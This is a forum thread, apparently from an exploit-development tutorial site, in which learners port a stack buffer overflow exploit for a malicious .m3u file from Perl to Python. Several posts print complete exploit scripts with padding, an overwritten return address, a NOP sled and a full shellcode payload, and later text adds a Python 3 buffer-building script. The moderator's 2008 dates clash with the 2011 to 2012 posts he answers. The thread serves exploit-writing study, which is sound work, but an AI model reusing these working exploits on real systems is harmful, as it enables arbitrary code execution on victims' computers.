[21:52] Newbie, June 21, 2011:
I've been reading through the exploit writing tutorials here for a bit, and I've run into an issue that I was wondering if someone could help me with. I've been following along writing in python rather than perl, so I've been translating the code as I go. It was working out perfectly fine until I reached one spot. I've come to the point where I have an address in memory to overwrite EIP with to give the program a JMP esp command, but the program does not appear to be overwriting EIP with the correct address. I know I am writing to the correct location, because if I replace the memory address with 'BBBB', EIP is overwritten with '42424242' (when they are the only B's in the file).
I investigated to see if I was using the struct.pack() method in python in a way that it functioned differently from perl's pack() function. As far as I can tell, I'm using it right. I equated "pack('V', 0x<address>)" to "struct.pack('<L', 0x<address>)". If I am not mistaken, these two should yield the same results, as 'V' and '<L' stand for little-endian unsigned long in their respective languages.
As a few final pieces of information on my problem, I am trying to use the address '01a8f23a' and EIP ends up overwritten with '000FFD4E'. When I run the program, it does indeed crash, but it does not execute the shellcode, presumably because of the wrong data being in EIP.
EDIT: Shortly after posting this, I realized that the value stored in EIP was just a little bit larger than the address of ESP, so I added 25 NOPs to the beginning of my shellcode and it worked fine. Sorry for the trouble.
My full code:
import struct

# Windows path; a raw string keeps the backslashes intact.
# 'wb' so the bytes are written exactly as given (no newline translation).
Fuzzed = open(r'C:\Documents and Settings\Owner\Desktop\Fuzzed.m3u', 'wb')
# padding up to the saved return address
Fuzzed.write(b'A' * 26072)
# little-endian 32-bit address, the equivalent of Perl's pack('V', ...)
string = struct.pack('<L', 0x01a8f23a)
Fuzzed.write(string)
Fuzzed.write(b'XXXX')
# the shellcode is split over several lines: adjacent string literals inside
# round brackets are joined by the parser, so no newline bytes are included
shellcode = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
             b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
             b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
             b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
             b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
             b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
             b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
             b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
             b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
             b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
             b"\x7f\xe8\x7b\xca")
Fuzzed.write(shellcode)
Fuzzed.close()
[07:16] Moderator, September 7, 2008:
ah cool – thanks for the feedback and update!
glad to see you got it to work
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
[20:09] Newbie, April 17, 2012:
Can anyone expand a bit on how to accomplish the same in Python 3.x (3.2)? I'm having difficulty sending the EIP address in '\x41\x41\x41\x41' format. I have done a bit of searching and found something regarding encoding differently. Is there a way to still send the EIP address correctly in Python 3?
[07:23] Moderator, September 7, 2008:
stay away from python 3 – there's no reason not to use python 2
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
[20:33] Newbie, July 17, 2012:
@burnfile I get the error "EOL while scanning string literal", and if I use """ for storing the shellcode in a variable the program executes without any error but the calculator doesn't spawn. This must be because it stores the string as we provide it, including the return character "\n".
#error code
import struct
fob=open('exploit.m3u','w')
a="\x41"*26069
#eip="\x3a\xf2\xa8\x01"
eip=struct.pack('<L',0x01a8f23a)
a+=eip
a+="\x90"*25
# triple-quoted literal: the line breaks become "\n" bytes inside the shellcode,
# which is the problem described above
shellcode = """\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1
\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30
\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa
\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96
\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b
\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a
\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83
\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98
\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61
\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05
\x7f\xe8\x7b\xca"""
a+=shellcode
fob.write(a)
fob.close()
I tried earlier with all the shellcode on just one line and it worked well, but if the shellcode is too long it is not possible to keep it on one line, so can you please help me with such a stupid problem..!!!
This is the code which worked:
import struct
fob=open('exploit.m3u','w')
a="\x41"*26069
#eip="\x3a\xf2\xa8\x01"
eip=struct.pack('<L',0x01a8f23a)
a+=eip
a+="\x90"*25
shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
a+=shellcode
fob.write(a)
fob.close()
The shellcode string is all on one line.
[20:16] Moderator, September 7, 2008:
In Python, you can put shellcode on multiple lines by wrapping it inside round brackets:
shellcode = ("\x01\x02\x03\x04"
"\x05\x06\x07"
"\x08\x09\x10"
"\x11\x12")
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
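The three points raised in this thread (that struct.pack('<L', ...) is the Python counterpart of Perl's pack('V', ...), that the April 2012 question about Python 3 comes down to bytes versus str, and the moderator's round-bracket tip for multi-line literals) can be checked together in one small Python 3 script. This is an added illustration, not code from the thread or from Corelan; the helper names (pack_address, build_buffer, str_vs_bytes_length, locate_address, write_file) are hypothetical, and the payload is constructed placeholder bytes, not the thread's shellcode. The offset and address values are the ones the thread uses.

```python
import struct

# Added illustration; helper names are hypothetical and not from the thread.
# Runs on Python 3, where str and bytes are distinct types.


def pack_address(addr):
    """Pack a 32-bit address little-endian.

    struct.pack('<L') is the Python equivalent of Perl's pack('V'),
    which is what the first post in the thread equates.
    """
    return struct.pack('<L', addr)


def str_vs_bytes_length(text):
    """Show why Python 3 str literals go wrong for raw byte buffers.

    As a str, '\\x90' is one code point, but a text-mode file encodes it
    with the default codec, and in UTF-8 it becomes two bytes. A bytes
    literal b'\\x90' is exactly one byte. Returns (str_len, encoded_len).
    """
    return len(text), len(text.encode('utf-8'))


# Multi-line bytes literal using implicit concatenation inside round
# brackets (the moderator's tip): the parser joins the pieces, so no
# newline characters end up in the buffer.
# Constructed placeholder bytes (int3 breakpoints), not the thread's shellcode.
PAYLOAD = (b"\xcc\xcc\xcc\xcc"
           b"\xcc\xcc\xcc\xcc")


def build_buffer(offset, ret_addr, nop_count, payload):
    """Assemble padding + packed return address + NOP sled + payload.

    Every piece must be bytes. In Python 3, adding a str to bytes raises
    TypeError, which is the failure the April 2012 question ran into.
    """
    if not isinstance(payload, bytes):
        raise TypeError("payload must be bytes: use b'...' literals in Python 3")
    return (b"A" * offset
            + pack_address(ret_addr)
            + b"\x90" * nop_count
            + payload)


def locate_address(buf, offset):
    """Return the four bytes sitting at the overwrite offset, for checking."""
    return buf[offset:offset + 4]


def write_file(path, data):
    """Write in binary mode; text mode would re-encode the bytes."""
    with open(path, 'wb') as f:
        f.write(data)
    return len(data)


if __name__ == '__main__':
    # values from the thread: 26069-byte padding, address 0x01a8f23a, 25 NOPs
    buf = build_buffer(26069, 0x01a8f23a, 25, PAYLOAD)
    print(pack_address(0x01a8f23a))        # b':\xf2\xa8\x01' (0x3a is ':')
    print(locate_address(buf, 26069))      # same four bytes, at the offset
    print(str_vs_bytes_length("\x90"))     # (1, 2)
    print(len(buf))                        # 26069 + 4 + 25 + 8
```

The packed address b'\x3a\xf2\xa8\x01' matches the commented-out eip string in the July 2012 post, so the two ways of writing it are interchangeable; the str_vs_bytes_length result is the reason a Python 3 port has to use b'...' literals and a file opened with 'wb' throughout.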